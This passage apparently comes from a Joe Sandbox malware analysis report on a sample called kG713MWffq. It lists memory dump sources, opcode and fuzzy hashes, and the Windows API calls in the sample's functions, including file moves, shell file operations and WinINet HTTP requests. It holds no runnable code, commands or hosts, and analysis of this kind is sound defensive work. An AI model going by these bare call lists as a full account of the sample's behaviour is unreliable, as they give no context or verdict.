                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                        • String ID: close all$Wu
                                                                                        • API String ID: 4174999648-1790509019
                                                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                        APIs
                                                                                        • CreateMenu.USER32 ref: 00448603
                                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                        • String ID: 0
                                                                                        • API String ID: 161812096-4108050209
                                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd0470be2dddd353ad4d7c0ecea591921fa35b9efeb60742a4289568149b26f6
                                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                        • Opcode Fuzzy Hash: cd0470be2dddd353ad4d7c0ecea591921fa35b9efeb60742a4289568149b26f6
                                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                        APIs
                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 978794511-0
                                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_memcmp
                                                                                        • String ID: '$\$h
                                                                                        • API String ID: 2205784470-1303700344
                                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                        Strings
                                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 2441338619-1568723262
                                                                                        • Opcode ID: 6ca95a049206163b32e68f36113e27bccbd1f3714250f3b34fae7ab63deb30de
                                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                        • Opcode Fuzzy Hash: 6ca95a049206163b32e68f36113e27bccbd1f3714250f3b34fae7ab63deb30de
                                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                        • String ID: @COM_EVENTOBJ
                                                                                        • API String ID: 327565842-2228938565
                                                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                        APIs
                                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                        • String ID: H
                                                                                        • API String ID: 3613100350-2852464175
                                                                                        • Opcode ID: aa9467e27181fdc89fa46768d9422833aaa0bae76b69810f9e513e9cb6b95459
                                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                        • Opcode Fuzzy Hash: aa9467e27181fdc89fa46768d9422833aaa0bae76b69810f9e513e9cb6b95459
                                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1291720006-3916222277
                                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                        • String ID: 0$2
                                                                                        • API String ID: 93392585-3793063076
                                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                        APIs
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                        • String ID: crts
                                                                                        • API String ID: 586820018-3724388283
                                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2326526234-1173974218
                                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
